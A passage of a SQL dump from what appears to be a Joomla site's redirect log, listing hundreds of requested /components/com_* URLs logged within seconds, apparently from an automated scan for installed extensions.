13:55:41','0000-00-00 00:00:00',301),(19244,'https://ekvatorprint.com.ua/components/com_most',NULL,'','',1,0,'2021-03-01 13:55:41','0000-00-00 00:00:00',301),(19245,'https://ekvatorprint.com.ua/components/com_bfsurvey',NULL,'','',1,0,'2021-03-01 13:55:41','0000-00-00 00:00:00',301),(19246,'https://ekvatorprint.com.ua/components/com_ezine',NULL,'','',1,0,'2021-03-01 13:55:41','0000-00-00 00:00:00',301),(19247,'https://ekvatorprint.com.ua/components/com_genealogy',NULL,'','',1,0,'2021-03-01 13:55:42','0000-00-00 00:00:00',301),(19248,'https://ekvatorprint.com.ua/components/com_sobi2',NULL,'','',1,0,'2021-03-01 13:55:42','0000-00-00 00:00:00',301),(19249,'https://ekvatorprint.com.ua/components/com_collector',NULL,'','',1,0,'2021-03-01 13:55:42','0000-00-00 00:00:00',301),(19250,'https://ekvatorprint.com.ua/components/com_jesubmit',NULL,'','',1,0,'2021-03-01 13:55:42','0000-00-00 00:00:00',301),(19251,'https://ekvatorprint.com.ua/components/com_cvmaker',NULL,'','',1,0,'2021-03-01 13:55:43','0000-00-00 00:00:00',301),(19252,'https://ekvatorprint.com.ua/components/com_profile',NULL,'','',1,0,'2021-03-01 13:55:43','0000-00-00 00:00:00',301),(19253,'https://ekvatorprint.com.ua/components/com_grid',NULL,'','',1,0,'2021-03-01 13:55:43','0000-00-00 00:00:00',301),(19254,'https://ekvatorprint.com.ua/components/com_flashgames',NULL,'','',1,0,'2021-03-01 13:55:43','0000-00-00 00:00:00',301),(19255,'https://ekvatorprint.com.ua/components/com_nfnaddressbook',NULL,'','',1,0,'2021-03-01 13:55:43','0000-00-00 00:00:00',301),(19256,'https://ekvatorprint.com.ua/components/com_route',NULL,'','',1,0,'2021-03-01 13:55:44','0000-00-00 00:00:00',301),(19257,'https://ekvatorprint.com.ua/components/com_zhgooglemap',NULL,'','',1,0,'2021-03-01 13:55:44','0000-00-00 00:00:00',301),(19258,'https://ekvatorprint.com.ua/components/com_jvehicles',NULL,'','',1,0,'2021-03-01 13:55:44','0000-00-00 00:00:00',301),(19259,'https://ekvatorprint.com.ua/components/com_mysms',NULL,'','',1,0,'2021-03-01 13:55:44','0000-00-00 00:00:00',301),(19260,'https://ekvatorprint.com.ua/components/com_simple',NULL,'','',1,0,'2021-03-01 13:55:45','0000-00-00 00:00:00',301),(19261,'https://ekvatorprint.com.ua/components/com_moodle',NULL,'','',1,0,'2021-03-01 13:55:45','0000-00-00 00:00:00',301),(19262,'https://ekvatorprint.com.ua/components/com_easybook',NULL,'','',1,0,'2021-03-01 13:55:45','0000-00-00 00:00:00',301),(19263,'https://ekvatorprint.com.ua/components/com_wmi',NULL,'','',1,0,'2021-03-01 13:55:45','0000-00-00 00:00:00',301),(19264,'https://ekvatorprint.com.ua/components/com_webring',NULL,'','',1,0,'2021-03-01 13:55:46','0000-00-00 00:00:00',301),(19265,'https://ekvatorprint.com.ua/components/com_gpstools',NULL,'','',1,0,'2021-03-01 13:55:46','0000-00-00 00:00:00',301),(19266,'https://ekvatorprint.com.ua/components/com_topics',NULL,'','',1,0,'2021-03-01 13:55:46','0000-00-00 00:00:00',301),(19267,'https://ekvatorprint.com.ua/components/com_acmisc',NULL,'','',1,0,'2021-03-01 13:55:46','0000-00-00 00:00:00',301),(19268,'https://ekvatorprint.com.ua/components/com_jstore',NULL,'','',1,0,'2021-03-01 13:55:46','0000-00-00 00:00:00',301),(19269,'https://ekvatorprint.com.ua/components/com_ttvideo',NULL,'','',1,0,'2021-03-01 13:55:47','0000-00-00 00:00:00',301),(19270,'https://ekvatorprint.com.ua/components/com_simpleimageupload',NULL,'','',1,0,'2021-03-01 13:55:47','0000-00-00 00:00:00',301),(19271,'https://ekvatorprint.com.ua/components/com_blogfactory',NULL,'','',1,0,'2021-03-01 13:55:47','0000-00-00 00:00:00',301),(19272,'https://ekvatorprint.com.ua/components/com_flashfun',NULL,'','',1,0,'2021-03-01 13:55:47','0000-00-00 00:00:00',301),(19273,'https://ekvatorprint.com.ua/components/com_joomlaupdater',NULL,'','',1,0,'2021-03-01 13:55:48','0000-00-00 00:00:00',301),(19274,'https://ekvatorprint.com.ua/components/com_shop',NULL,'','',1,0,'2021-03-01 13:55:48','0000-00-00 00:00:00',301),(19275,'https://ekvatorprint.com.ua/components/com_ongallery',NULL,'','',1,0,'2021-03-01 13:55:48','0000-00-00 00:00:00',301),(19276,'https://ekvatorprint.com.ua/components/com_spidercalendar',NULL,'','',1,0,'2021-03-01 13:55:48','0000-00-00 00:00:00',301),(19277,'https://ekvatorprint.com.ua/components/com_jomres',NULL,'','',1,0,'2021-03-01 13:55:48','0000-00-00 00:00:00',301),(19278,'https://ekvatorprint.com.ua/components/com_jeauto',NULL,'','',1,0,'2021-03-01 13:55:49','0000-00-00 00:00:00',301),(19279,'https://ekvatorprint.com.ua/components/com_joomclip',NULL,'','',1,0,'2021-03-01 13:55:49','0000-00-00 00:00:00',301),(19280,'https://ekvatorprint.com.ua/components/com_ninjamonials',NULL,'','',1,0,'2021-03-01 13:55:49','0000-00-00 00:00:00',301),(19281,'https://ekvatorprint.com.ua/components/com_books',NULL,'','',1,0,'2021-03-01 13:55:49','0000-00-00 00:00:00',301),(19282,'https://ekvatorprint.com.ua/components/com_rsmonials',NULL,'','',1,0,'2021-03-01 13:55:50','0000-00-00 00:00:00',301),(19283,'https://ekvatorprint.com.ua/components/com_photobattle',NULL,'','',1,0,'2021-03-01 13:55:50','0000-00-00 00:00:00',301),(19284,'https://ekvatorprint.com.ua/components/com_joltcard',NULL,'','',1,0,'2021-03-01 13:55:50','0000-00-00 00:00:00',301),(19285,'https://ekvatorprint.com.ua/components/com_communitysurveys',NULL,'','',1,0,'2021-03-01 13:55:50','0000-00-00 00:00:00',301),(19286,'https://ekvatorprint.com.ua/components/com_quiz',NULL,'','',1,0,'2021-03-01 13:55:50','0000-00-00 00:00:00',301),(19287,'https://ekvatorprint.com.ua/components/com_rss',NULL,'','',1,0,'2021-03-01 13:55:51','0000-00-00 00:00:00',301),(19288,'https://ekvatorprint.com.ua/components/com_shoutbox',NULL,'','',1,0,'2021-03-01 13:55:51','0000-00-00 00:00:00',301),(19289,'https://ekvatorprint.com.ua/components/com_joomlaradiov5',NULL,'','',1,0,'2021-03-01 13:55:51','0000-00-00 00:00:00',301),(19290,'https://ekvatorprint.com.ua/components/com_gambling',NULL,'','',1,0,'2021-03-01 13:55:52','0000-00-00 00:00:00',301),(19291,'https://ekvatorprint.com.ua/components/com_xsstream',NULL,'','',1,0,'2021-03-01 13:55:52','0000-00-00 00:00:00',301),(19292,'https://ekvatorprint.com.ua/components/com_jcs',NULL,'','',1,0,'2021-03-01 13:55:52','0000-00-00 00:00:00',301),(19293,'https://ekvatorprint.com.ua/components/com_aclassf',NULL,'','',1,0,'2021-03-01 13:55:52','0000-00-00 00:00:00',301),(19294,'https://ekvatorprint.com.ua/components/com_party',NULL,'','',1,0,'2021-03-01 13:55:52','0000-00-00 00:00:00',301),(19295,'https://ekvatorprint.com.ua/components/com_wddownload',NULL,'','',1,0,'2021-03-01 13:55:53','0000-00-00 00:00:00',301),(19296,'https://ekvatorprint.com.ua/components/com_rdautos',NULL,'','',1,0,'2021-03-01 13:55:53','0000-00-00 00:00:00',301),(19297,'https://ekvatorprint.com.ua/components/com_aist',NULL,'','',1,0,'2021-03-01 13:55:53','0000-00-00 00:00:00',301),(19298,'https://ekvatorprint.com.ua/components/com_na_content',NULL,'','',1,0,'2021-03-01 13:55:53','0000-00-00 00:00:00',301),(19299,'https://ekvatorprint.com.ua/components/com_enmasse',NULL,'','',1,0,'2021-03-01 13:55:54','0000-00-00 00:00:00',301),(19300,'https://ekvatorprint.com.ua/components/com_spielothek',NULL,'','',1,0,'2021-03-01 13:55:54','0000-00-00 00:00:00',301),(19301,'https://ekvatorprint.com.ua/components/com_uhp2',NULL,'','',1,0,'2021-03-01 13:55:54','0000-00-00 00:00:00',301),(19302,'https://ekvatorprint.com.ua/components/com_cgtestimonial',NULL,'','',1,0,'2021-03-01 13:55:54','0000-00-00 00:00:00',301),(19303,'https://ekvatorprint.com.ua/components/com_google',NULL,'','',1,0,'2021-03-01 13:55:54','0000-00-00 00:00:00',301),(19304,'https://ekvatorprint.com.ua/components/com_activities',NULL,'','',1,0,'2021-03-01 13:55:55','0000-00-00 00:00:00',301),(19305,'https://ekvatorprint.com.ua/components/com_productshowcase',NULL,'','',1,0,'2021-03-01 13:55:55','0000-00-00 00:00:00',301),(19306,'https://ekvatorprint.com.ua/components/com_payplans',NULL,'','',1,0,'2021-03-01 13:55:55','0000-00-00 00:00:00',301),(19307,'https://ekvatorprint.com.ua/components/com_joominaflileselling',NULL,'','',1,0,'2021-03-01 13:55:55','0000-00-00 00:00:00',301),(19308,'https://ekvatorprint.com.ua/components/com_joomportfolio',NULL,'','',1,0,'2021-03-01 13:55:56','0000-00-00 00:00:00',301),(19309,'https://ekvatorprint.com.ua/components/com_dv',NULL,'','',1,0,'2021-03-01 13:55:56','0000-00-00 00:00:00',301),(19310,'https://ekvatorprint.com.ua/components/com_chronoconnectivity',NULL,'','',1,0,'2021-03-01 13:55:56','0000-00-00 00:00:00',301),(19311,'https://ekvatorprint.com.ua/components/com_jepoll',NULL,'','',1,0,'2021-03-01 13:55:56','0000-00-00 00:00:00',301),(19312,'https://ekvatorprint.com.ua/components/com_videodb',NULL,'','',1,0,'2021-03-01 13:55:56','0000-00-00 00:00:00',301),(19313,'https://ekvatorprint.com.ua/components/com_jcart',NULL,'','',1,0,'2021-03-01 13:55:57','0000-00-00 00:00:00',301),(19314,'https://ekvatorprint.com.ua/components/com_ezstore',NULL,'','',1,0,'2021-03-01 13:55:57','0000-00-00 00:00:00',301),(19315,'https://ekvatorprint.com.ua/components/com_artforms',NULL,'','',1,0,'2021-03-01 13:55:57','0000-00-00 00:00:00',301),(19316,'https://ekvatorprint.com.ua/components/com_groovygallery',NULL,'','',1,0,'2021-03-01 13:55:57','0000-00-00 00:00:00',301),(19317,'https://ekvatorprint.com.ua/components/com_aclsfgpl',NULL,'','',1,0,'2021-03-01 13:55:58','0000-00-00 00:00:00',301),(19318,'https://ekvatorprint.com.ua/components/com_advancedpoll',NULL,'','',1,0,'2021-03-01 13:55:58','0000-00-00 00:00:00',301),(19319,'https://ekvatorprint.com.ua/components/com_sg',NULL,'','',1,0,'2021-03-01 13:55:58','0000-00-00 00:00:00',301),(19320,'https://ekvatorprint.com.ua/components/com_amocourse',NULL,'','',1,0,'2021-03-01 13:55:58','0000-00-00 00:00:00',301),(19321,'https://ekvatorprint.com.ua/components/com_peoplebook',NULL,'','',1,0,'2021-03-01 13:55:58','0000-00-00 00:00:00',301),(19322,'https://ekvatorprint.com.ua/components/com_ixxocart',NULL,'','',1,0,'2021-03-01 13:55:59','0000-00-00 00:00:00',301),(19323,'https://ekvatorprint.com.ua/components/com_jukebox',NULL,'','',1,0,'2021-03-01 13:55:59','0000-00-00 00:00:00',301),(19324,'https://ekvatorprint.com.ua/components/com_jvideodirect',NULL,'','',1,0,'2021-03-01 13:55:59','0000-00-00 00:00:00',301),(19325,'https://ekvatorprint.com.ua/components/com_jobgrokapp',NULL,'','',1,0,'2021-03-01 13:55:59','0000-00-00 00:00:00',301),(19326,'https://ekvatorprint.com.ua/components/com_pofos',NULL,'','',1,0,'2021-03-01 13:56:00','0000-00-00 00:00:00',301),(19327,'https://ekvatorprint.com.ua/components/com_bca-rss-syndicator',NULL,'','',1,0,'2021-03-01 13:56:00','0000-00-00 00:00:00',301),(19328,'https://ekvatorprint.com.ua/components/com_communitypolls',NULL,'','',1,0,'2021-03-01 13:56:00','0000-00-00 00:00:00',301),(19329,'https://ekvatorprint.com.ua/components/com_poll',NULL,'','',1,0,'2021-03-01 13:56:00','0000-00-00 00:00:00',301),(19330,'https://ekvatorprint.com.ua/components/com_races',NULL,'','',1,0,'2021-03-01 13:56:01','0000-00-00 00:00:00',301),(19331,'https://ekvatorprint.com.ua/components/com_ca',NULL,'','',1,0,'2021-03-01 13:56:01','0000-00-00 00:00:00',301),(19332,'https://ekvatorprint.com.ua/components/com_omnirealestate',NULL,'','',1,0,'2021-03-01 13:56:01','0000-00-00 00:00:00',301),(19333,'https://ekvatorprint.com.ua/components/com_cb',NULL,'','',1,0,'2021-03-01 13:56:01','0000-00-00 00:00:00',301),(19334,'https://ekvatorprint.com.ua/components/com_ricette',NULL,'','',1,0,'2021-03-01 13:56:02','0000-00-00 00:00:00',301),(19335,'https://ekvatorprint.com.ua/components/com_hdwplayer',NULL,'','',1,0,'2021-03-01 13:56:02','0000-00-00 00:00:00',301),(19336,'https://ekvatorprint.com.ua/components/com_mtfireeagle',NULL,'','',1,0,'2021-03-01 13:56:02','0000-00-00 00:00:00',301),(19337,'https://ekvatorprint.com.ua/components/com_cx',NULL,'','',1,0,'2021-03-01 13:56:02','0000-00-00 00:00:00',301),(19338,'https://ekvatorprint.com.ua/components/com_catalogshop',NULL,'','',1,0,'2021-03-01 13:56:02','0000-00-00 00:00:00',301),(19339,'https://ekvatorprint.com.ua/components/com_prayercenter',NULL,'','',1,0,'2021-03-01 13:56:03','0000-00-00 00:00:00',301),(19340,'https://ekvatorprint.com.ua/components/com_pcchess',NULL,'','',1,0,'2021-03-01 13:56:03','0000-00-00 00:00:00',301),(19341,'https://ekvatorprint.com.ua/components/com_oziogallery',NULL,'','',1,0,'2021-03-01 13:56:03','0000-00-00 00:00:00',301),(19342,'https://ekvatorprint.com.ua/components/com_hotproperty',NULL,'','',1,0,'2021-03-01 13:56:03','0000-00-00 00:00:00',301),(19343,'https://ekvatorprint.com.ua/components/com_loudmouth',NULL,'','',1,0,'2021-03-01 13:56:04','0000-00-00 00:00:00',301),(19344,'https://ekvatorprint.com.ua/components/com_publisher',NULL,'','',1,0,'2021-03-01 13:56:04','0000-00-00 00:00:00',301),(19345,'https://ekvatorprint.com.ua/components/com_neoreferences',NULL,'','',1,0,'2021-03-01 13:56:04','0000-00-00 00:00:00',301),(19346,'https://ekvatorprint.com.ua/components/com_facebook',NULL,'','',1,0,'2021-03-01 13:56:04','0000-00-00 00:00:00',301),(19347,'https://ekvatorprint.com.ua/components/com_articles',NULL,'','',1,0,'2021-03-01 13:56:04','0000-00-00 00:00:00',301),(19348,'https://ekvatorprint.com.ua/components/com_vr',NULL,'','',1,0,'2021-03-01 13:56:05','0000-00-00 00:00:00',301),(19349,'https://ekvatorprint.com.ua/components/com_bsq',NULL,'','',1,0,'2021-03-01 13:56:05','0000-00-00 00:00:00',301),(19350,'https://ekvatorprint.com.ua/components/com_webeecomment',NULL,'','',1,0,'2021-03-01 13:56:05','0000-00-00 00:00:00',301),(19351,'https://ekvatorprint.com.ua/components/com_mediaalert',NULL,'','',1,0,'2021-03-01 13:56:05','0000-00-00 00:00:00',301),(19352,'https://ekvatorprint.com.ua/components/com_videogallerylite',NULL,'','',1,0,'2021-03-01 13:56:05','0000-00-00 00:00:00',301),(19353,'https://ekvatorprint.com.ua/components/com_discussions',NULL,'','',1,0,'2021-03-01 13:56:06','0000-00-00 00:00:00',301),(19354,'https://ekvatorprint.com.ua/components/com_serie',NULL,'','',1,0,'2021-03-01 13:56:06','0000-00-00 00:00:00',301),(19355,'https://ekvatorprint.com.ua/components/com_cpeventcalendar',NULL,'','',1,0,'2021-03-01 13:56:06','0000-00-00 00:00:00',301),(19356,'https://ekvatorprint.com.ua/components/com_alfcontact',NULL,'','',1,0,'2021-03-01 13:56:06','0000-00-00 00:00:00',301),(19357,'https://ekvatorprint.com.ua/components/com_jetext',NULL,'','',1,0,'2021-03-01 13:56:07','0000-00-00 00:00:00',301),(19358,'https://ekvatorprint.com.ua/components/com_elite_experts',NULL,'','',1,0,'2021-03-01 13:56:07','0000-00-00 00:00:00',301),(19359,'https://ekvatorprint.com.ua/components/com_jfusion',NULL,'','',1,0,'2021-03-01 13:56:07','0000-00-00 00:00:00',301),(19360,'https://ekvatorprint.com.ua/components/com_biographies',NULL,'','',1,0,'2021-03-01 13:56:07','0000-00-00 00:00:00',301),(19361,'https://ekvatorprint.com.ua/components/com_jbpublishdownfp',NULL,'','',1,0,'2021-03-01 13:56:07','0000-00-00 00:00:00',301),(19362,'https://ekvatorprint.com.ua/components/com_maianmusic',NULL,'','',1,0,'2021-03-01 13:56:08','0000-00-00 00:00:00',301),(19363,'https://ekvatorprint.com.ua/components/com_gnosis',NULL,'','',1,0,'2021-03-01 13:56:08','0000-00-00 00:00:00',301),(19364,'https://ekvatorprint.com.ua/components/com_flipwall',NULL,'','',1,0,'2021-03-01 13:56:08','0000-00-00 00:00:00',301),(19365,'https://ekvatorprint.com.ua/components/com_motor',NULL,'','',1,0,'2021-03-01 13:56:09','0000-00-00 00:00:00',301),(19366,'https://ekvatorprint.com.ua/components/com_installer',NULL,'','',1,0,'2021-03-01 13:56:09','0000-00-00 00:00:00',301),(19367,'https://ekvatorprint.com.ua/components/com_joomdoc',NULL,'','',1,0,'2021-03-01 13:56:09','0000-00-00 00:00:00',301),(19368,'https://ekvatorprint.com.ua/components/com_album',NULL,'','',1,0,'2021-03-01 13:56:09','0000-00-00 00:00:00',301),(19369,'https://ekvatorprint.com.ua/components/com_calendarplanner',NULL,'','',1,0,'2021-03-01 13:56:09','0000-00-00 00:00:00',301),(19370,'https://ekvatorprint.com.ua/components/com_memory',NULL,'','',1,0,'2021-03-01 13:56:10','0000-00-00 00:00:00',301),(19371,'https://ekvatorprint.com.ua/components/com_mosmedia',NULL,'','',1,0,'2021-03-01 13:56:10','0000-00-00 00:00:00',301),(19372,'https://ekvatorprint.com.ua/components/com_drawroot',NULL,'','',1,0,'2021-03-01 13:56:10','0000-00-00 00:00:00',301),(19373,'https://ekvatorprint.com.ua/components/com_jsjobs',NULL,'','',1,0,'2021-03-01 13:56:10','0000-00-00 00:00:00',301),(19374,'https://ekvatorprint.com.ua/components/com_akocomment',NULL,'','',1,0,'2021-03-01 13:56:11','0000-00-00 00:00:00',301),(19375,'https://ekvatorprint.com.ua/components/com_php',NULL,'','',2,0,'2021-03-01 13:56:11','0000-00-00 00:00:00',301),(19376,'https://ekvatorprint.com.ua/components/com_mgm',NULL,'','',1,0,'2021-03-01 13:56:11','0000-00-00 00:00:00',301),(19377,'https://ekvatorprint.com.ua/components/com_mymsg',NULL,'','',1,0,'2021-03-01 13:56:11','0000-00-00 00:00:00',301),(19378,'https://ekvatorprint.com.ua/components/com_jdirectory',NULL,'','',1,0,'2021-03-01 13:56:12','0000-00-00 00:00:00',301),(19379,'https://ekvatorprint.com.ua/components/com_nkc',NULL,'','',1,0,'2021-03-01 13:56:12','0000-00-00 00:00:00',301),(19380,'https://ekvatorprint.com.ua/components/com_listing',NULL,'','',1,0,'2021-03-01 13:56:12','0000-00-00 00:00:00',301),(19381,'https://ekvatorprint.com.ua/components/com_volunteer',NULL,'','',1,0,'2021-03-01 13:56:12','0000-00-00 00:00:00',301),(19382,'https://ekvatorprint.com.ua/components/com_network',NULL,'','',1,0,'2021-03-01 13:56:13','0000-00-00 00:00:00',301),(19383,'https://ekvatorprint.com.ua/components/com_markt',NULL,'','',1,0,'2021-03-01 13:56:13','0000-00-00 00:00:00',301),(19384,'https://ekvatorprint.com.ua/components/com_eventbooking',NULL,'','',1,0,'2021-03-01 13:56:13','0000-00-00 00:00:00',301),(19385,'https://ekvatorprint.com.ua/components/com_teamdisplay',NULL,'','',1,0,'2021-03-01 13:56:13','0000-00-00 00:00:00',301),(19386,'https://ekvatorprint.com.ua/components/com_rokmodule',NULL,'','',1,0,'2021-03-01 13:56:13','0000-00-00 00:00:00',301),(19387,'https://ekvatorprint.com.ua/components/com_joaktree',NULL,'','',1,0,'2021-03-01 13:56:14','0000-00-00 00:00:00',301),(19388,'https://ekvatorprint.com.ua/components/com_datafeeds',NULL,'','',1,0,'2021-03-01 13:56:14','0000-00-00 00:00:00',301),(19389,'https://ekvatorprint.com.ua/components/com_affiliatetracker',NULL,'','',1,0,'2021-03-01 13:56:14','0000-00-00 00:00:00',301),(19390,'https://ekvatorprint.com.ua/components/com_directory',NULL,'','',1,0,'2021-03-01 13:56:14','0000-00-00 00:00:00',301),(19391,'https://ekvatorprint.com.ua/components/com_zcalendar',NULL,'','',1,0,'2021-03-01 13:56:15','0000-00-00 00:00:00',301),(19392,'https://ekvatorprint.com.ua/components/com_calendar',NULL,'','',1,0,'2021-03-01 13:56:15','0000-00-00 00:00:00',301),(19393,'https://ekvatorprint.com.ua/components/com_jquickcontact',NULL,'','',1,0,'2021-03-01 13:56:15','0000-00-00 00:00:00',301),(19394,'https://ekvatorprint.com.ua/components/com_joomlaub',NULL,'','',1,0,'2021-03-01 13:56:15','0000-00-00 00:00:00',301),(19395,'https://ekvatorprint.com.ua/components/com_seek',NULL,'','',1,0,'2021-03-01 13:56:16','0000-00-00 00:00:00',301),(19396,'https://ekvatorprint.com.ua/components/com_teacher',NULL,'','',1,0,'2021-03-01 13:56:16','0000-00-00 00:00:00',301),(19397,'https://ekvatorprint.com.ua/components/com_jwhmcs',NULL,'','',1,0,'2021-03-01 13:56:16','0000-00-00 00:00:00',301),(19398,'https://ekvatorprint.com.ua/components/com_cbe',NULL,'','',1,0,'2021-03-01 13:56:16','0000-00-00 00:00:00',301),(19399,'https://ekvatorprint.com.ua/components/com_category',NULL,'','',1,0,'2021-03-01 13:56:16','0000-00-00 00:00:00',301),(19400,'https://ekvatorprint.com.ua/components/com_jcollection',NULL,'','',1,0,'2021-03-01 13:56:17','0000-00-00 00:00:00',301),(19401,'https://ekvatorprint.com.ua/components/com_departments',NULL,'','',1,0,'2021-03-01 13:56:17','0000-00-00 00:00:00',301),(19402,'https://ekvatorprint.com.ua/components/com_searchlog',NULL,'','',1,0,'2021-03-01 13:56:17','0000-00-00 00:00:00',301),(19403,'https://ekvatorprint.com.ua/components/com_zelig',NULL,'','',1,0,'2021-03-01 13:56:17','0000-00-00 00:00:00',301),(19404,'https://ekvatorprint.com.ua/components/com_myportfolio',NULL,'','',1,0,'2021-03-01 13:56:18','0000-00-00 00:00:00',301),(19405,'https://ekvatorprint.com.ua/components/com_jeguestbook',NULL,'','',1,0,'2021-03-01 13:56:18','0000-00-00 00:00:00',301),(19406,'https://ekvatorprint.com.ua/components/com_foobla',NULL,'','',1,0,'2021-03-01 13:56:18','0000-00-00 00:00:00',301),(19407,'https://ekvatorprint.com.ua/components/com_gallery',NULL,'','',1,0,'2021-03-01 13:56:18','0000-00-00 00:00:00',301),(19408,'https://ekvatorprint.com.ua/components/com_noticias',NULL,'','',1,0,'2021-03-01 13:56:18','0000-00-00 00:00:00',301),(19409,'https://ekvatorprint.com.ua/components/com_kkcontent',NULL,'','',1,0,'2021-03-01 13:56:19','0000-00-00 00:00:00',301),(19410,'https://ekvatorprint.com.ua/components/com_pro_desk',NULL,'','',1,0,'2021-03-01 13:56:20','0000-00-00 00:00:00',301),(19411,'https://ekvatorprint.com.ua/components/com_pms',NULL,'','',1,0,'2021-03-01 13:56:20','0000-00-00 00:00:00',301),(19412,'https://ekvatorprint.com.ua/components/com_wmt_content_timeline',NULL,'','',1,0,'2021-03-01 13:56:20','0000-00-00 00:00:00',301),(19413,'https://ekvatorprint.com.ua/components/com_jequestions',NULL,'','',1,0,'2021-03-01 13:56:20','0000-00-00 00:00:00',301),(19414,'https://ekvatorprint.com.ua/components/com_alphauserpoints',NULL,'','',1,0,'2021-03-01 13:56:20','0000-00-00 00:00:00',301),(19415,'https://ekvatorprint.com.ua/components/com_clan',NULL,'','',1,0,'2021-03-01 13:56:21','0000-00-00 00:00:00',301),(19416,'https://ekvatorprint.com.ua/components/com_teams',NULL,'','',1,0,'2021-03-01 13:56:21','0000-00-00 00:00:00',301),(19417,'https://ekvatorprint.com.ua/components/com_simpleboard',NULL,'','',1,0,'2021-03-01 13:56:21','0000-00-00 00:00:00',301),(19418,'https://ekvatorprint.com.ua/components/com_aml_2',NULL,'','',1,0,'2021-03-01 13:56:21','0000-00-00 00:00:00',301),(19419,'https://ekvatorprint.com.ua/components/com_equotes',NULL,'','',1,0,'2021-03-01 13:56:22','0000-00-00 00:00:00',301),(19420,'https://ekvatorprint.com.ua/components/com_job',NULL,'','',1,0,'2021-03-01 13:56:22','0000-00-00 00:00:00',301),(19421,'https://ekvatorprint.com.ua/components/com_amblog',NULL,'','',1,0,'2021-03-01 13:56:22','0000-00-00 00:00:00',301),(19422,'https://ekvatorprint.com.ua/components/com_news_portal',NULL,'','',1,0,'2021-03-01 13:56:22','0000-00-00 00:00:00',301),(19423,'https://ekvatorprint.com.ua/components/com_alfurqan15x',NULL,'','',1,0,'2021-03-01 13:56:22','0000-00-00 00:00:00',301),(19424,'https://ekvatorprint.com.ua/components/com_jmsfileseller',NULL,'','',1,0,'2021-03-01 13:56:23','0000-00-00 00:00:00',301),(19425,'https://ekvatorprint.com.ua/components/com_guesser',NULL,'','',1,0,'2021-03-01 13:56:23','0000-00-00 00:00:00',301),(19426,'https://ekvatorprint.com.ua/components/com_dwgraphs',NULL,'','',1,0,'2021-03-01 13:56:23','0000-00-00 00:00:00',301),(19427,'https://ekvatorprint.com.ua/components/com_hbooking',NULL,'','',1,0,'2021-03-01 13:56:23','0000-00-00 00:00:00',301),(19428,'https://ekvatorprint.com.ua/components/com_jefaqpro',NULL,'','',1,0,'2021-03-01 13:56:24','0000-00-00 00:00:00',301),(19429,'https://ekvatorprint.com.ua/components/com_ticketbook',NULL,'','',1,0,'2021-03-01 13:56:24','0000-00-00 00:00:00',301),(19430,'https://ekvatorprint.com.ua/components/com_pbbooking',NULL,'','',1,0,'2021-03-01 13:56:24','0000-00-00 00:00:00',301),(19431,'https://ekvatorprint.com.ua/components/com_zimbcomment',NULL,'','',1,0,'2021-03-01 13:56:24','0000-00-00 00:00:00',301),(19432,'https://ekvatorprint.com.ua/components/com_xewebtv',NULL,'','',1,0,'2021-03-01 13:56:24','0000-00-00 00:00:00',301),(19433,'https://ekvatorprint.com.ua/components/com_jnewspaper',NULL,'','',1,0,'2021-03-01 13:56:25','0000-00-00 00:00:00',301),(19434,'https://ekvatorprint.com.ua/components/com_madeira',NULL,'','',1,0,'2021-03-01 13:56:25','0000-00-00 00:00:00',301),(19435,'https://ekvatorprint.com.ua/components/com_jlord_rss',NULL,'','',1,0,'2021-03-01 13:56:25','0000-00-00 00:00:00',301),(19436,'https://ekvatorprint.com.ua/components/com_joomleague',NULL,'','',1,0,'2021-03-01 13:56:25','0000-00-00 00:00:00',301),(19437,'https://ekvatorprint.com.ua/components/com_mygallery',NULL,'','',1,0,'2021-03-01 13:56:26','0000-00-00 00:00:00',301),(19438,'https://ekvatorprint.com.ua/components/com_business',NULL,'','',1,0,'2021-03-01 13:56:26','0000-00-00 00:00:00',301),(19439,'https://ekvatorprint.com.ua/components/com_jinc',NULL,'','',1,0,'2021-03-01 13:56:26','0000-00-00 00:00:00',301),(19440,'https://ekvatorprint.com.ua/components/com_sportfusion',NULL,'','',1,0,'2021-03-01 13:56:26','0000-00-00 00:00:00',301),(19441,'https://ekvatorprint.com.ua/components/com_awesom',NULL,'','',1,0,'2021-03-01 13:56:26','0000-00-00 00:00:00',301),(19442,'https://ekvatorprint.com.ua/components/com_nfn_addressbook',NULL,'','',1,0,'2021-03-01 13:56:27','0000-00-00 00:00:00',301),(19443,'https://ekvatorprint.com.ua/components/com_simple_review',NULL,'','',1,0,'2021-03-01 13:56:27','0000-00-00 00:00:00',301),(19444,'https://ekvatorprint.com.ua/components/com_jeajaxeventcalendar',NULL,'','',1,0,'2021-03-01 13:56:27','0000-00-00 00:00:00',301),(19445,'https://ekvatorprint.com.ua/components/com_jomtube',NULL,'','',1,0,'2021-03-01 13:56:27','0000-00-00 00:00:00',301),(19446,'https://ekvatorprint.com.ua/components/com_dj',NULL,'','',1,0,'2021-03-01 13:56:28','0000-00-00 00:00:00',301),(19447,'https://ekvatorprint.com.ua/components/com_events',NULL,'','',1,0,'2021-03-01 13:56:28','0000-00-00 00:00:00',301),(19448,'https://ekvatorprint.com.ua/components/com_menu',NULL,'','',1,0,'2021-03-01 13:56:28','0000-00-00 00:00:00',301),(19449,'https://ekvatorprint.com.ua/components/com_mochigames',NULL,'','',1,0,'2021-03-01 13:56:28','0000-00-00 00:00:00',301),(19450,'https://ekvatorprint.com.ua/components/com_autostand',NULL,'','',1,0,'2021-03-01 13:56:28','0000-00-00 00:00:00',301),(19451,'https://ekvatorprint.com.ua/components/com_formtool',NULL,'','',1,0,'2021-03-01 13:56:29','0000-00-00 00:00:00',301),(19452,'https://ekvatorprint.com.ua/components/com_ds',NULL,'','',1,0,'2021-03-01 13:56:29','0000-00-00 00:00:00',301),(19453,'https://ekvatorprint.com.ua/components/com_dt',NULL,'','',1,0,'2021-03-01 13:56:29','0000-00-00 00:00:00',301),(19454,'https://ekvatorprint.com.ua/components/com_aicontactsafe',NULL,'','',1,0,'2021-03-01 13:56:29','0000-00-00 00:00:00',301),(19455,'https://ekvatorprint.com.ua/components/com_connect',NULL,'','',1,0,'2021-03-01 13:56:30','0000-00-00 00:00:00',301),(19456,'https://ekvatorprint.com.ua/components/com_bfsurvey_pro',NULL,'','',1,0,'2021-03-01 13:56:30','0000-00-00 00:00:00',301),(19457,'https://ekvatorprint.com.ua/components/com_geoboerse',NULL,'','',1,0,'2021-03-01 13:56:30','0000-00-00 00:00:00',301),(19458,'https://ekvatorprint.com.ua/components/com_jumi',NULL,'','',1,0,'2021-03-01 13:56:30','0000-00-00 00:00:00',301),(19459,'https://ekvatorprint.com.ua/components/com_lurm',NULL,'','',1,0,'2021-03-01 13:56:30','0000-00-00 00:00:00',301),(19460,'https://ekvatorprint.com.ua/components/com_phocamaps',NULL,'','',1,0,'2021-03-01 